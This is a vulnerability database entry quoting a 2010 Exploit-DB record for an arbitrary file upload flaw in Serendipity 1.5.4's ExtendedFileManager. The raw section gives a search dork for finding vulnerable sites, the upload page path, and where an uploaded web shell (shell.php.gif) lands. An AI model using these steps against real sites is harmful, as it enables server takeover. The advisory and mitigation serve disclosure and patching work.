Vendor: Serendipity
By: pentesters.ir
CVSS: 7,5 (HIGH)
Vulnerability Type: File Upload
CWE: 434
Product Name: Serendipity
Affected Version From: 1.5.4
Affected Version To: 1.5.4
Patch Exists: YES
Related CWE: N/A
CPE: a:s9y:serendipity
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Date: 2010

remote 0day file upload

A vulnerability exists in Serendipity 1.5.4 which allows remote attackers to upload arbitrary files via the manager.php page in the htmlarea/plugins/ExtendedFileManager/ directory.

Mitigation:

Upgrade to the latest version of Serendipity

Exploit-DB raw data:

In The Name Of GOD 
[+] Exploit Title:remote 0day file upload
[+] Date: 2010
[+] script:Serendipity 1.5.4
[+] Software Link: http://www.s9y.org/12.html
[+] Author  : pentesters.ir
[+]discovered by:ahmadbady
[+] Contact : kivi_hacker666@yahoo.com
[+] Website : WwW.PenTesters.IR 
[+] Greeting: Behzad, navid, ...
[+]dork:"Powered by s9y"  and  "Powered by serendipity"
----------------------------------------------------------------------------
up:
/path/htmlarea/plugins/ExtendedFileManager/manager.php

shell:
/htmlarea/plugins/ExtendedFileManager/demo_images/shell.php.gif
------------------------------------------------------------------------------